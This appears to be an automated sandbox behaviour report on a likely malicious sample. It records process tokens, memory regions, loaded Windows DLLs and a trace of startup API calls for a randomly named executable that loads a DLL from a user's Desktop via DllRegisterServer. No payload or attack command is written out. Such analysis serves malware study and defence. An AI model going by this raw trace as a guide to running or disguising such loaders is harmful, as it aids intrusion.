"CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2710 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2711 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2712 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2713 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 2714 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2715 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2716 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2717 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2718 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 2719 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2720 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2721 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2722 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 2723 start_va = 0x5c0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 2724 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2725 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2726 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2727 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2728 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2729 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2730 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2731 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2732 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2733 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2734 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2735 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2736 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 2737 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2738 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2739 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2740 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2741 start_va = 0x400000 end_va = 0x500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2742 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 2743 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2744 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2745 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2746 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2747 start_va = 0x1200000 end_va = 0x134ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2748 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2749 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2750 start_va = 0x1200000 end_va = 0x12fffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2751 start_va = 0x1340000 end_va = 0x134ffff entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Thread: id = 130 os_tid = 0xd78 [0035.866] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af654 | out: lpSystemTimeAsFileTime=0x1af654*(dwLowDateTime=0xe3110190, dwHighDateTime=0x1d3dfba)) [0035.866] GetCurrentProcessId () returned 0xd74 [0035.866] GetCurrentThreadId () returned 0xd78 [0035.866] GetTickCount () returned 0x1816e [0035.866] QueryPerformanceCounter (in: lpPerformanceCount=0x1af64c | out: lpPerformanceCount=0x1af64c*=375869036) returned 1 [0035.867] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.867] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0035.867] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0035.867] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0035.867] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0035.867] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.868] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.868] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.868] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.868] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.868] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.868] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.868] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.868] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.868] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.868] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.868] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.868] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.868] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.869] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.869] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.869] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.869] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.869] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.869] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.869] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.869] GetCurrentThreadId () returned 0xd78 [0035.869] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllRegisterServer /fn_args=\"iexplore.exe\"" [0035.869] GetEnvironmentStringsW () returned 0x3179c0* [0035.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0035.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x13409f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0035.870] FreeEnvironmentStringsW (penv=0x3179c0) returned 1 [0035.870] GetStartupInfoA (in: lpStartupInfo=0x1af5a4 | out: lpStartupInfo=0x1af5a4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0035.870] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0035.870] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0035.870] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0035.870] SetHandleCount (uNumber=0x20) returned 0x20 [0035.870] GetLastError () returned 0x0 [0035.870] SetLastError (dwErrCode=0x0) [0035.870] GetLastError () returned 0x0 [0035.870] SetLastError (dwErrCode=0x0) [0035.870] GetLastError () returned 0x0 [0035.870] SetLastError (dwErrCode=0x0) [0035.870] GetACP () returned 0x4e4 [0035.870] GetLastError () returned 0x0 [0035.870] SetLastError (dwErrCode=0x0) [0035.870] IsValidCodePage (CodePage=0x4e4) returned 1 [0035.870] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1af584 | out: lpCPInfo=0x1af584) returned 1 [0035.870] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1af050 | out: lpCPInfo=0x1af050) returned 1 [0035.870] GetLastError () returned 0x0 [0035.870] SetLastError (dwErrCode=0x0) [0035.870] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x1aefe0 | out: lpCharType=0x1aefe0) returned 1 [0035.870] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1af464, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.870] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1af464, cbMultiByte=256, lpWideCharStr=0x1aedc8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.870] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x1af064 | out: lpCharType=0x1af064) returned 1 [0035.870] GetLastError () returned 0x0 [0035.870] SetLastError (dwErrCode=0x0) [0035.870] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0035.870] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1af464, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.870] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1af464, cbMultiByte=256, lpWideCharStr=0x1aed98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뛒矲狰Ā") returned 256 [0035.870] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뛒矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.871] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뛒矲狰Ā", cchSrc=256, lpDestStr=0x1aeb88, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.871] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x1af364, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÌL«õ\x9cõ\x1a", lpUsedDefaultChar=0x0) returned 256 [0035.871] GetLastError () returned 0x0 [0035.871] SetLastError (dwErrCode=0x0) [0035.871] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1af464, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.871] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1af464, cbMultiByte=256, lpWideCharStr=0x1aedb8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뛒矲狰Ā") returned 256 [0035.871] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뛒矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.871] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뛒矲狰Ā", cchSrc=256, lpDestStr=0x1aeba8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0035.871] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x1af264, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f 